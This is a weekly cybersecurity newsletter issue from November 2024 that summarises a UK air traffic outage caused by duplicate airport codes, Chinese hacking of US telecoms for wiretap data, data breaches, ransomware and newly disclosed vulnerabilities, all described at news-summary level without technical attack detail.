Robin’s Newsletter #335

17 November 2024. Volume 7, Issue 46
£100M air traffic incident caused by duplicate airport codes. CISA, FBI says China was after wiretap data.
Join hundreds of subscribers who get this first, every Sunday. Subscribe

This week

Thanks for your feedback on the Need to Know Matrix. I’m making some further adjustments to font size this week. Let me know what you think!). 

Need to Know, 17th November 2024

  • Duplicate airport codes caused £100M outage (This Week)
  • Wordpress security plugin vulnerability (And Finally)
  • Zero-days were most commonly exploited in 2023 (Threat Intel)
  • Thousands of spoof Black Friday websites stealing card info (Interesting Stats)
  • Chinese group was after wiretap data (This Week)

£100M air traffic control outage caused by duplicate airport codes

  • An outage at the UK’s air traffic control operator, which cost an estimated £75 million—£100 million, was caused by two airports sharing the same airport code in their flight plans. The 28 August 2023 incident occurred when flight routing systems attempted to route an aircraft that had travelled from DVL (Devil’s Lake, North Dakota) to DVL (Deauville, France).
  • The circular nature of the route caused an exception, and the system put itself into maintenance mode. A standby system similarly couldn’t handle the routing and also stopped processing because, while physically separate, it ran the same software. In both cases, this is intended safety behaviour to prevent potentially corrupted flight data from being presented to air traffic controllers. The independent reviewers urged the software developer to review its assurance processes.
  • The issues were compounded because the password of a second-line engineer “could not be readily verified due to the architecture of the system.” The engineer took another 1.5 hours to get to the site, and third-line support wasn’t sought until three hours after the initial event.
  • This sort of independent review is well worth a read, and consider how your team can implement similar feedback loops and continual improvements into your own major incident management processes. LINK, REPORT (PDF)

CISA and FBI confirm Chinese group was after wiretap data

  • Two US government agencies have confirmed that a Chinese state-sponsored group recently breached US telecommunications companies to gain access to wiretap systems.
  • The CISA (Cybersecurity and Infrastructure Security Agency) and the FBI joint statement referred to the theft of customer call records (who called who, when) and other law enforcement requests (e.g., wiretaps). This information is useful to intelligence agencies seeking to understand relationships between individuals or who is being targeted by ‘the other side’. 
  • The Wall Street Journal reported on the incident in October (vol. 7, iss. 41) at what’s believed to be AT&T, Lumen (CenturyLink), and Verizon. LINK

Interesting stats

4,695 fraudulent domains have been attributed to a Chinese threat actor dubbed SilkSpecter by EclecticIQ researchers. The domains, which generally feature ‘.shop’, ‘.vip’ and ‘.store’ top-level domains, are thought to be part of a network to capture consumer payment card information of consumers seeking Black Friday deals. LINK

Other newsy bits / in brief

🤓 Interesting reads:

  • The story of Charlotte Hooper, whose photos were posted on x-rated forums by a stalker, and who now is operations manager at the (excellent) Cyber Helpline. LINK, The Cyber Helpline  
  • A deluge of deregulation may lead to less visibility for US policy officials, while the country’s offensive cyber capabilities may be more frequently deployed: Carly Page on the ransomware problem set to be inherited by Trump’s administration next year. LINK
  • Threat actors are increasingly using Scalable Vector Graphics (SVG) to evade email protection systems and display phishing login prompts. LINK

⚠️ Incidents:

  • Amazon has confirmed a data breach of employee data, allegedly stolen from a subcontractor’s MOVEit file transfer appliance in May 2023. The 2.8 million lines of employee data include names, email and contact information, building locations and more. Delta Airlines and 23 other organisations were named in a cybercrime forum post. AMAZON, DELTA
  • Retailer Ahold Delhaize, owner of Food Lion, Stop & Shop, Albert Heijn, and others, has pulled systems offline following a “cybersecurity issue”. E-commerce and some pharmacy operations have been impacted. LINK
  • DemandScience, a business contact data broker, suffered a data breach sometime prior to February 2024 that resulted in the loss of information on 122 million people. The company told someone whose data was included in the breach data set that the “leaked data originated from a system that has been decommissioned for approximately two years.” LINK
  • AnnieMac (the American Neighborhood Mortgage Acceptance Company) says that an unknown intruder gained access to the data of 171,000 customers between the 21st and 23rd of August. LINK

🏴‍☠️ Ransomware:

  • The Hungarian government has confirmed that its defence procurement agency has been attacked; the INC Ransomware group claimed responsibility and posted screenshots of VBÜ systems. LINK

🕵️ Threat Intel:

  • A RustyStealer malware infection may lead to a Ymir ransomware attack. LINK
  • North Korean threat actors are using fake Notepad and Minesweeper apps to infect Mac users. LINK
  • The Chinese state-linked Volt Typhoon group has been busy rebuilding its “KV-Botnet”. SecurityScorecard researchers say their primary strategy is to compromise SOHO networking devices, including Netgear ProSAFE firewalls, Cisco RV320s, DrayTek Vigor routers, and Axis IP cameras. LINK
  • Five Eyes cyber agencies warn that the exploitation of zero-day vulnerabilities is the “new normal”. Previously, older software issues have topped the list of routinely exploited vulnerabilities. LINK, LIST (PDF)
  • Switzerland’s cyber security agency is warning residents about malware being delivered by post. The “fake letters” include a QR code to download a ‘new weather app’ which actually redirects victims to a malicious application. LINK

🪲 Vulnerabilities:

  • D-Link won’t fix three vulnerabilities, including one critical severity issue, in its DSL6740C modem because the devices were declared ‘end of service’ at the beginning of the year. The critical issue, CVE-2024-11068 (9.8/10), allows an unauthenticated attacker to modify any user’s password, granting them access to the system. Around 60,000 devices are believed to be exposed on the Internet, with many in Taiwan. (This sort of vulnerability is the type that the Chinese Volt Typhoon group would use to re-establish its botnet (see Threat Intel above). LINK
  • Citrix has released a patch for a privilege escalation and (limited) remote code execution vulnerabilities in Session Recording functionality, CVE-2024-8086 and CVE-2024-8069, respectively. LINK, ADIVSORY
  • Fortinet has patched a high-severity vulnerability in its FortiClient VPN application. CVE-2024-47574 (7.4/10) is an authentication bypass issue allowing lower-privileged users to gain higher privileges on Microsoft Windows devices. LINK, ADVISORY

🧑‍💻 End user and consumer:

  • Google is adding a scam protection feature to phone calls on its Pixel devices. The AI-powered system analyses conversations, looking for patterns associated with scammers, and prompts the user to end the call. LINK

📜 Policy & Regulation:

  • National Cyber Director Harry Coker Jr has said the US must take action to harmonise cyber regulation and compliance demands so that CISOs and security teams can spend more time managing their organisation’s cyber risk. LINK

👮 Law Enforcement:

  • Jack Teixeira, a former Massachusetts Air National Guardsman, has been sentenced to 15 years in prison for sharing classified US military documents on Discord. LINK, vol. 6, iss. 16
  • Police in Delhi, India, have arrested a suspect they believe is linked to the theft of $230 million worth of cryptocurrency from the country’s WazirX platform earlier this year. LINK

💰 Investments, mergers and acquisitions:

  • Trustwave and Cybereason announced a merger this week. The merger is described as a “consolidation” move, bringing together Trustwave’s managed services and Cybereason’s product expertise. Terms of the deal were not disclosed. It’s not dissimilar to Sophos’ acquisition of SecureWorks, announced three weeks ago. LINK, vol. 7, iss. 43
  • BitSight has agreed to acquire Cybersixgill for $115 million. The security ratings company will integrate Cybersixgill’s ‘real-time’ threat intelligence, collected from the web, chat rooms, and underground forums, to improve its supply chain security offering. Cybersixgill was valued at $162 million in 2022. LINK

🗞️ Industry news:

  • Oxford University will lead a new cyber research network. The Cyber Security Research and Networking Environment (CRANE) is funded by UK Research and Innovation. LINK, UKRI

And finally

  • The Really Simple Security plugin for WordPress contains an authentication bypass vulnerability that may affect millions of websites. CVE-2024-10924 (9.8/10) was discovered by researchers at WordFence and, ironically, only applies to users that have enabled multi-factor authentication. LINK, MORE
Robin

  Robin's Newsletter - Volume 7

  NATS Air Traffic Control (ATC) China Telecommunications Salt Typhoon Cyber-stalking Scaleable Vector Graphics (SVG) Volt Typhoon WordPress Zero-day D-Link Citrix Fortinet